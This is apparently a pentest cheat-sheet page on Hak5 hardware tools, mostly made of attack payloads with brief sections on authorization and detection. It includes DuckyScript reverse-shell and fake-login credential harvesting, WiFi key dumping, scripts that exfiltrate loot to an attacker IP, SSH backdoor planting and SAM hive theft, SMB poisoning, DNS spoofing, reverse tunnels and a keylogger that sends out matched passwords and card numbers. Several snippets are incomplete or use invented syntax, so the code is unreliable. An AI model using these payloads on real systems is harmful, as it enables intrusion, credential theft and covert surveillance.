Zum Inhalt springen
1337skills 1337skills - Referenzen

Hak5 Toolkit

Hak5 manufactures purpose-built hardware tools for authorized physical penetration testing, social engineering assessments, and red team operations. This guide covers the complete ecosystem, payload development, and operational workflows.

Overview

Abschnitt betitelt „Overview“

Hak5’s hardware platform targets USB, network, and wireless attack surfaces in controlled engagements. All tools require explicit authorization before deployment on target networks. The ecosystem integrates with Cloud C2 for centralized command & control, exfiltration management, and post-engagement analytics.

DeviceInterfacePrimary AttackRange
Rubber DuckyUSB HIDKeystroke injectionPhysical
Bash BunnyUSBMulti-vector attacksPhysical
LAN TurtleUSB EthernetNetwork implantLocal network
Packet SquirrelUSB EthernetInline network attacksNetwork path
Key CrocUSB HID + WiFiKeystroke logging30m+ WiFi
O.MG CableHidden HIDCovert attacksWiFi-enabled

USB Rubber Ducky

Abschnitt betitelt „USB Rubber Ducky“

The Rubber Ducky is a keystroke injection tool that emulates a USB keyboard to execute rapid pre-programmed commands on target systems. Target OS recognizes it as a trusted input device.

Key Characteristics:

  • USB HID keyboard emulation
  • DuckyScript 3.0 payload language
  • Runs payloads from onboard storage
  • No network connectivity (completely covert)
  • Works across Windows, macOS, Linux

DuckyScript 3.0 Basics

Abschnitt betitelt „DuckyScript 3.0 Basics“
REM Simple keystroke injection payload
DELAY 1000
STRING cmd.exe
ENTER
DELAY 500
STRING ipconfig /all
ENTER

Common Commands:

REM Delays
DELAY 500        REM Wait 500ms

REM Keystrokes
ENTER            REM Press Enter
TAB              REM Tab key
ESCAPE           REM Escape

REM Modifier combinations
CTRL-ALT-DELETE
WINDOWS-R        REM Run dialog

REM Type text
STRING whoami    REM Type literal text

REM Comments
REM This is ignored during execution

Windows Reverse Shell Payload

Abschnitt betitelt „Windows Reverse Shell Payload“
REM Windows reverse shell via PowerShell
DELAY 2000
WINDOWS-R
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 1500
STRING $client = New-Object System.Net.Sockets.TCPClient('10.0.0.5', 4444);
ENTER
DELAY 300
STRING $stream = $client.GetStream();
ENTER
DELAY 300
STRING [byte[]]$buf = 0..65535|%{0};
ENTER
DELAY 300
STRING $sw = New-Object System.IO.StreamWriter($stream);
ENTER
DELAY 300
STRING $host.UI.RawUI.WindowTitle = 'reverse';
ENTER
DELAY 300
STRING $sw.AutoFlush = $true;
ENTER
DELAY 300
STRING $sr = New-Object System.IO.StreamReader($stream);
ENTER
DELAY 1000

Credential Harvesting Payload

Abschnitt betitelt „Credential Harvesting Payload“
REM Prompt for credentials with fake login dialog
DELAY 2000
WINDOWS-R
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING [System.Reflection.Assembly]::LoadWithPartialName('System.windows.forms')
ENTER
DELAY 300
STRING $form = New-Object System.Windows.Forms.Form
ENTER
DELAY 300
STRING $form.Text = 'Windows Security'
ENTER
DELAY 300
STRING $form.Size = '300,200'
ENTER
DELAY 300
STRING $label = New-Object System.Windows.Forms.Label
ENTER
DELAY 300
STRING $label.Text = 'Password Expired. Enter credentials:'
ENTER

WiFi Exfiltration (via secondary tool)

Abschnitt betitelt „WiFi Exfiltration (via secondary tool)“
REM Extract WiFi credentials post-exploitation
DELAY 1000
WINDOWS-R
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING netsh wlan show profile
ENTER
DELAY 500
STRING netsh wlan show profile * key=clear
ENTER
DELAY 500

Bash Bunny

Abschnitt betitelt „Bash Bunny“

The Bash Bunny is a multi-vector USB attack platform supporting DuckyScript, Bash scripting, and simultaneous USB personalities (storage, serial, ethernet, keyboard). Includes onboard processing for advanced payload logic.

Key Characteristics:

  • USB multi-personality support (HID, storage, ethernet, serial)
  • 16 payload switch positions (physical mode selector)
  • Bash shell scripting on device
  • Onboard Python & command-line tools
  • LED status indicators for operational feedback

Bash Bunny Payload Structure

Abschnitt betitelt „Bash Bunny Payload Structure“
#!/bin/bash
# payload.sh - Bash Bunny attack payload

# Variables
TARGET_NETWORK="internal.corp"
EXFIL_SERVER="10.0.0.5"

# Initialization phase
function initialize() {
    # Change LED color (red = active, blue = exfil, green = success)
    led red
    echo "Payload starting..."
}

# Attack phase
function attack() {
    # Enable ethernet personality
    switch_to_ethernet
    
    # Configure network
    ifconfig eth0 10.0.0.100 netmask 255.255.255.0
    
    # Run reconnaissance
    nmap -p 445 -sV $TARGET_NETWORK
}

# Exfiltration phase
function exfiltrate() {
    # Send data to C2
    curl -X POST -d @loot.txt $EXFIL_SERVER/upload
    led blue
}

# Cleanup
function cleanup() {
    rm -f loot.txt
    led green
}

# Main execution
initialize
attack
exfiltrate
cleanup

QuickCreds Payload (Password Harvesting)

Abschnitt betitelt „QuickCreds Payload (Password Harvesting)“
#!/bin/bash
# QuickCreds: Extract Windows cached credentials

TARGET="WINDOWS_BOX_IP"
LOOT_DIR="/root/loot"

# Create persistent RDP/SSH backdoor
function create_backdoor() {
    ssh-keyscan -t rsa $TARGET >> known_hosts
    sshpass -p "password" ssh root@$TARGET \
        'echo "backdoor_key" >> ~/.ssh/authorized_keys'
}

# Dump hashes via SMB share
function extract_hashes() {
    mount -t cifs //$TARGET/C\$ $LOOT_DIR -o user=admin,password=pass
    cp $LOOT_DIR/Windows/System32/config/SAM .
    umount $LOOT_DIR
}

create_backdoor
extract_hashes

BunnyTap Payload (SMB Capture)

Abschnitt betitelt „BunnyTap Payload (SMB Capture)“
#!/bin/bash
# BunnyTap: Capture SMB credentials in transit

# Enable MITM mode
ifconfig eth0 up
brctl addbr br0
brctl addif br0 eth0 wlan0

# Start Responder (SMB poisoning)
responder -I br0 -v -f

# Log captured hashes
tcpdump -i br0 -w smb_capture.pcap 'port 445 or port 139'

SMB Exfiltration Payload

Abschnitt betitelt „SMB Exfiltration Payload“
#!/bin/bash
# Exfil data via anonymous SMB share to attacker server

TARGET_SHARE="10.0.0.5"
SOURCE_FILE="/root/data.txt"

# Mount attacker's SMB share
mount -t cifs //$TARGET_SHARE/exfil /mnt/share \
    -o user=anonymous,password=""

# Copy sensitive files
cp $SOURCE_FILE /mnt/share/

# Verify transfer
ls -la /mnt/share/

umount /mnt/share

LAN Turtle

Abschnitt betitelt „LAN Turtle“

The LAN Turtle is a covert network implant disguised as a USB-to-Ethernet adapter. Sits inline on target network, routes traffic through attacker’s infrastructure, and maintains persistent access via cellular or WiFi backhaul.

Key Characteristics:

  • USB-powered network bridge
  • Covert deployment (appears as USB adapter)
  • Cellular/WiFi-based C2
  • Persistent backdoor on network
  • Automatic reconnection on network change

LAN Turtle Modules

Abschnitt betitelt „LAN Turtle Modules“
ModuleFunctionUse Case
autosshSSH reverse tunnelRemote shell access
meterpreterMetasploit payloadFull exploitation framework
DNS spoofDNS response hijackingRedirect traffic to attacker server
ptunnelICMP tunnelingBypass firewall egress filters
netcatTCP/UDP listenerQuick reverse shell

LAN Turtle Configuration

Abschnitt betitelt „LAN Turtle Configuration“
# SSH reverse tunnel to attacker server (10.0.0.5)
autossh -M 20000 -f -N \
    -R 2222:localhost:22 \
    -i /root/.ssh/turtle_key \
    attacker@10.0.0.5

# DNS spoofing payload
dnsspoof -i eth0 -f dns-targets.txt

# ptunnel ICMP tunnel (bypass egress filtering)
ptunnel -x password -p -l 8888 -da 10.0.0.5 -dp 22

DNS Spoofing Configuration

Abschnitt betitelt „DNS Spoofing Configuration“

Create /root/dns-targets.txt:

windows.update.com 10.0.0.5
*.internal.local 10.0.0.5
mail.company.com 10.0.0.6

Then run:

dnsspoof -i eth0 -f /root/dns-targets.txt

Packet Squirrel

Abschnitt betitelt „Packet Squirrel“

The Packet Squirrel is an inline network implant that sits between a wall jack and target computer/printer. Captures traffic, modifies packets in transit, and exfiltrates data to attacker infrastructure.

Key Characteristics:

  • Inline network bridge (transparent)
  • tcpdump traffic capture
  • DNS/HTTP/HTTPS interception
  • Payload switching via LED indicators
  • Covert cabling (Ethernet cable passes through)

Packet Squirrel Payload Modes

Abschnitt betitelt „Packet Squirrel Payload Modes“
# Mode 1: tcpdump capture
LED SETUP

# Start tcpdump on both interfaces
tcpdump -i eth0 -w /tmp/capture-eth0.pcap &
tcpdump -i eth1 -w /tmp/capture-eth1.pcap &

LED ATTACK
sleep 600
LED EXFIL

# No exfil on Packet Squirrel - manual recovery

DNS Spoofing Mode

Abschnitt betitelt „DNS Spoofing Mode“
#!/bin/bash
# Packet Squirrel DNS spoofing

LED SETUP

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Start dnsspoof
dnsspoof -i eth0 -f /tmp/dns-targets.txt &
dnsspoof -i eth1 -f /tmp/dns-targets.txt &

LED ATTACK
sleep 3600

LED EXFIL
pkill dnsspoof

VPN Tunnel Mode

Abschnitt betitelt „VPN Tunnel Mode“
#!/bin/bash
# Tunnel all target traffic through attacker VPN

LED SETUP

# Configure iptables for transparent proxy
iptables -t nat -A PREROUTING -i eth0 -j REDIRECT --to-port 8888

# Start OpenVPN tunnel
openvpn --remote 10.0.0.5 --proto udp --port 1194 &

LED ATTACK

Key Croc

Abschnitt betitelt „Key Croc“

The Key Croc is a WiFi-enabled keystroke logger and injector with regex-based triggers. Captures keystrokes locally, logs them, and executes payloads based on matched patterns. Includes cloud exfiltration.

Key Characteristics:

  • USB HID keystroke capture & injection
  • WiFi connectivity (30m+ range)
  • Regex pattern matching triggers
  • Real-time keystroke logging
  • Cloud C2 integration

Key Croc Configuration

Abschnitt betitelt „Key Croc Configuration“
# /etc/keycroc/config.conf

# Enable keystroke logging
log_keystrokes=true
log_file=/tmp/keylog.txt

# WiFi settings
wifi_ssid="KeyCroc-Admin"
wifi_password="SecurePass123"

# Cloud C2 server
c2_server="cloud.hak5.org"
c2_api_key="your_api_key_here"

# Regex triggers
trigger_password = "(?i)(password|passwd|pwd).*:" 
trigger_credit = "\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}"
trigger_api_key = "[a-zA-Z0-9]{32,}"

Regex-Based Payload Execution

Abschnitt betitelt „Regex-Based Payload Execution“
# Trigger injection when "sudo" is detected
trigger_sudo = "^sudo"
on_trigger_sudo {
    DELAY 500
    ENTER
    STRING whoami
    ENTER
}

# Exfil on detected credit card
trigger_cc = "\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}"
on_trigger_cc {
    curl -X POST -d @keylog.txt https://c2.server/exfil
}

Cloud Exfiltration

Abschnitt betitelt „Cloud Exfiltration“
#!/bin/bash
# Upload captured keystrokes to cloud C2

API_KEY="your_api_key_here"
C2_SERVER="https://cloud.hak5.org/api"

curl -X POST \
    -H "Authorization: Bearer $API_KEY" \
    -F "file=@keylog.txt" \
    "$C2_SERVER/devices/keycroc/upload"

O.MG Cable

Abschnitt betitelt „O.MG Cable“

The O.MG Cable is a hardware-implanted HID attack platform embedded within a standard USB charging/data cable. Appears completely legitimate but executes keystrokes or command execution payloads on connection.

Key Characteristics:

  • Invisible hardware implant in standard cable
  • WiFi-triggered payload execution
  • Geofencing support (trigger based on location)
  • Keylogging capability
  • Requires physical installation (pre-engagement)

O.MG Cable Payload

Abschnitt betitelt „O.MG Cable Payload“
REM O.MG Cable payload - executed via WiFi trigger
DELAY 3000
WINDOWS-R
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 1500
STRING $url='http://10.0.0.5:8080/beacon';
ENTER
DELAY 300
STRING $data=@{hostname=$env:computername; user=$env:username};
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri $url -Method POST -Body $data
ENTER

WiFi-Triggered Execution

Abschnitt betitelt „WiFi-Triggered Execution“
#!/bin/bash
# O.MG Cable WiFi trigger configuration

# Connect to specified SSID
nmcli dev wifi connect "TargetNetwork" password "WifiPass"

# Trigger payload on connection
curl http://192.168.4.1/api/trigger -X POST \
    -H "Content-Type: application/json" \
    -d '{"payload": "reverse_shell", "target": "10.0.0.5"}'

Geofencing Payload

Abschnitt betitelt „Geofencing Payload“
#!/bin/bash
# Execute payload when within GPS range of target

# Check GPS coordinates (requires GPS module)
lat=$(curl http://192.168.4.1/api/location | jq .latitude)
lon=$(curl http://192.168.4.1/api/location | jq .longitude)

# Target office coordinates
TARGET_LAT=37.7749
TARGET_LON=-122.4194
RADIUS=100  # meters

# Calculate distance
distance=$(python3 -c "
import math
lat_diff = ($lat - $TARGET_LAT) * 111000  # meters per degree
lon_diff = ($lon - $TARGET_LON) * 111000 * 0.8
dist = math.sqrt(lat_diff**2 + lon_diff**2)
print(int(dist))
")

# Trigger if within range
if [ $distance -lt $RADIUS ]; then
    curl http://192.168.4.1/api/trigger -X POST -d '{"payload": "exfil"}'
fi

Cloud C2

Abschnitt betitelt „Cloud C2“

Cloud C2 is Hak5’s centralized command & control platform for managing multiple devices, deploying payloads, and retrieving exfiltrated data. Provides dashboard, device provisioning, and loot management.

Key Features:

  • Multi-device management
  • Payload library & deployment
  • Exfiltration data aggregation
  • Real-time status monitoring
  • API-based automation

Device Provisioning

Abschnitt betitelt „Device Provisioning“
#!/bin/bash
# Register device with Cloud C2

C2_API="https://api.cloud.hak5.org/v1"
DEVICE_TYPE="bash_bunny"
DEVICE_ID=$(uname -a | md5sum | cut -d' ' -f1)
API_KEY="your_api_key_here"

curl -X POST "$C2_API/devices/register" \
    -H "Authorization: Bearer $API_KEY" \
    -H "Content-Type: application/json" \
    -d "{
        \"device_id\": \"$DEVICE_ID\",
        \"device_type\": \"$DEVICE_TYPE\",
        \"hostname\": \"$(hostname)\",
        \"version\": \"2.7.0\"
    }"

Payload Deployment

Abschnitt betitelt „Payload Deployment“
#!/bin/bash
# Deploy payload to device via Cloud C2

DEVICE_ID="device-xyz123"
PAYLOAD_ID="payload-reverse-shell"

curl -X POST "https://api.cloud.hak5.org/v1/devices/$DEVICE_ID/deploy" \
    -H "Authorization: Bearer $API_KEY" \
    -H "Content-Type: application/json" \
    -d "{
        \"payload_id\": \"$PAYLOAD_ID\",
        \"priority\": \"high\",
        \"execute_now\": true
    }"

Loot Retrieval

Abschnitt betitelt „Loot Retrieval“
#!/bin/bash
# Download exfiltrated data from Cloud C2

API_KEY="your_api_key_here"
OUTPUT_DIR="/tmp/loot"

# List available loot
curl -X GET "https://api.cloud.hak5.org/v1/loot" \
    -H "Authorization: Bearer $API_KEY" | jq .

# Download specific file
curl -X GET "https://api.cloud.hak5.org/v1/loot/keylog-2026-04-15.txt" \
    -H "Authorization: Bearer $API_KEY" \
    -o "$OUTPUT_DIR/keylog.txt"

Payload Development

Abschnitt betitelt „Payload Development“

DuckyScript 3.0 Syntax Reference

Abschnitt betitelt „DuckyScript 3.0 Syntax Reference“
REM Command injection payload template

REM Initialization
DELAY 2000

REM Target Windows
WINDOWS-R
DELAY 500
STRING cmd /c
ENTER

REM Execute commands
STRING tasklist
ENTER
DELAY 1000

REM Extract data
STRING echo %USERNAME% > user.txt
ENTER

REM Exfiltration (requires secondary tool)
STRING powershell -Exec Bypass -NoP "
ENTER
STRING Get-ChildItem -Path 'C:\Users' -Include '*.docx','*.xlsx'
ENTER

Bash Bunny Payload Structure

Abschnitt betitelt „Bash Bunny Payload Structure“
#!/bin/bash
# Standard Bash Bunny payload structure

TARGET_IP="$1"
LOOT_DIR="/root/loot"
EXFIL_ENDPOINT="http://10.0.0.5:8888"

# LED status
led red

# Reconnaissance phase
function recon() {
    nmap -sV -p 22,445,3389 $TARGET_IP > $LOOT_DIR/recon.txt
    led yellow
}

# Exploitation phase
function exploit() {
    sshpass -p "password" ssh root@$TARGET_IP "id > /tmp/whoami.txt"
    led red
}

# Exfiltration phase
function exfil() {
    curl -X POST -F "file=@$LOOT_DIR/recon.txt" $EXFIL_ENDPOINT/upload
    curl -X POST -F "file=@/tmp/whoami.txt" $EXFIL_ENDPOINT/upload
    led blue
}

# Cleanup
function cleanup() {
    rm -rf $LOOT_DIR
    led green
}

main() {
    recon
    exploit
    exfil
    cleanup
}

main $@

Community Payload Repository

Abschnitt betitelt „Community Payload Repository“

Hak5 maintains official payload repos:

# Clone Bash Bunny payloads
git clone https://github.com/hak5/bashbunny-payloads.git
cd bashbunny-payloads

# Clone Rubber Ducky payloads
git clone https://github.com/hak5/USB-Rubber-Ducky.git

# Clone LAN Turtle payloads
git clone https://github.com/hak5/lant-payloads.git

Physical Assessment Workflow

Abschnitt betitelt „Physical Assessment Workflow“

Pre-Engagement Phase

Abschnitt betitelt „Pre-Engagement Phase“

  1. Authorization Review

    • Written approval from target organization
    • Scope definition (devices, locations, timeframe)
    • Incident response contact numbers
    • Rules of engagement

  2. Reconnaissance

    • Physical security audit (entry points, cameras)
    • Wireless survey (WiFi SSIDs, signal strength)
    • Personnel observation (badge types, habits)
    • Facility layout mapping

Deployment Phase

Abschnitt betitelt „Deployment Phase“
#!/bin/bash
# Deployment checklist script

# 1. Verify device is configured
echo "Checking Bash Bunny configuration..."
ls -la /root/payloads/

# 2. Test payload execution locally
echo "Testing payload..."
bash /root/payloads/test_payload.sh

# 3. Verify exfil connectivity
echo "Testing exfil endpoint..."
curl -X POST http://10.0.0.5:8888/test -d "device=ready"

# 4. Set device to correct switch position
echo "Switch device to position 1 before deployment"

# 5. Start logging
echo "Deployment: $(date)" >> /tmp/deployment.log

Execution Phase

Abschnitt betitelt „Execution Phase“
#!/bin/bash
# Monitor payload execution

# Watch logs
tail -f /tmp/payloads.log

# Check LED status
# Red = Active execution
# Blue = Exfiltration
# Green = Complete
# Yellow = Error

# Monitor network traffic (if inline)
tcpdump -i eth0 -n 'not icmp'

# Check for blocked ports
netstat -an | grep ESTABLISHED

Post-Engagement Phase

Abschnitt betitelt „Post-Engagement Phase“

  1. Data Collection

    • Retrieve all exfiltrated data from Cloud C2
    • Export device logs
    • Document timeline of events

  2. Sanitization

    # Clear logs on device
rm -rf /root/loot
rm -f /tmp/payload.log

# Reset to factory defaults
# (varies by device type)

  3. Reporting

    • Summarize findings
    • Document successful attack vectors
    • Recommend mitigations

Detection and Countermeasures

Abschnitt betitelt „Detection and Countermeasures“

USB Port Controls

Abschnitt betitelt „USB Port Controls“
ControlEffectivenessCost
Disable USB portsHighLow
USB port blockersHighLow
Whitelist USB devicesMediumMedium
USB packet inspectionLowHigh

Hardware Detection

Abschnitt betitelt „Hardware Detection“
# Linux: Detect unknown USB devices
lsusb | grep -v "Manufacturer"

# Windows: List USB devices via PowerShell
Get-PnpDevice -Class USB

# Monitor for HID devices
cat /proc/bus/input/devices | grep -i "handlers"

Network Monitoring

Abschnitt betitelt „Network Monitoring“
# Detect suspicious ethernet adapters
ip link show

# Monitor ARP for spoofing
arp-scan -l

# Capture suspicious DNS queries
tcpdump -i eth0 -n 'udp port 53' | grep -v "IN\?"

# Detect ICMP tunneling
tcpdump -i eth0 'icmp' -v

Behavioral Detection

Abschnitt betitelt „Behavioral Detection“
  • Unexpected USB devices appearing
  • Unknown USB keyboard/mouse drivers
  • Processes spawning unusual reverse shells
  • Network traffic to external IPs during off-hours
  • Anomalous credential usage patterns

Troubleshooting

Abschnitt betitelt „Troubleshooting“

Device Not Recognized

Abschnitt betitelt „Device Not Recognized“
# Check USB connection
lsusb

# Check device logs
cat /root/logs/device.log

# Reset via button hold (device-specific)
# Bash Bunny: Hold button for 7 seconds
# Rubber Ducky: Power cycle

# Update firmware
# Download latest from hak5.org

Payload Execution Failures

Abschnitt betitelt „Payload Execution Failures“
  • DELAY too short — Increase delay timings between commands
  • Keyboard layout mismatch — Configure correct locale in settings
  • USB power insufficient — Use powered USB hub
  • Permissions denied — Run with admin/sudo privileges

Exfiltration Issues

Abschnitt betitelt „Exfiltration Issues“
# Test connectivity to C2
ping 10.0.0.5

# Verify API key
curl -H "Authorization: Bearer $API_KEY" \
    https://api.cloud.hak5.org/v1/devices

# Check firewall rules
ufw status
iptables -L -n

Cloud C2 Connection Problems

Abschnitt betitelt „Cloud C2 Connection Problems“
  • Verify device has internet connectivity
  • Check API key expiration
  • Validate DNS resolution
  • Test against alternate C2 endpoint

Best Practices

Abschnitt betitelt „Best Practices“
  1. Always Obtain Written Authorization — Document scope & ROE before deployment
  2. Test Payloads in Lab — Verify all payloads locally before field deployment
  3. Use Cloud C2 for Tracking — Maintain audit trail of all deployments
  4. Isolate Test Networks — Never test on production systems
  5. Sanitize Devices Post-Assessment — Wipe all logs & exfiltrated data
  6. Vary Tactics & Techniques — Don’t repeat same payloads in successive assessments
  7. Document Everything — Capture exact commands, timestamps, and results
  8. Have Incident Response Ready — Coordinate with target’s IR team
  9. Secure Exfiltrated Data — Use encryption for data in transit and at rest
  10. Train Team on OPSEC — Physical devices can be recovered; treat as compromised
Abschnitt betitelt „Related Tools“
ToolPurposeOverlap
Flipper ZeroMulti-protocol hacking device (NFC, RFID, BLE)Complementary
Proxmark3RFID/NFC cloning & analysisComplementary
WiFi PineappleRogue AP & MITM attacksComplementary
PwnagotchiAutomated WiFi handshake captureComplementary
MetasploitPost-exploitation frameworkUsed with payloads
Burp SuiteWeb app penetration testingNetwork-based attacks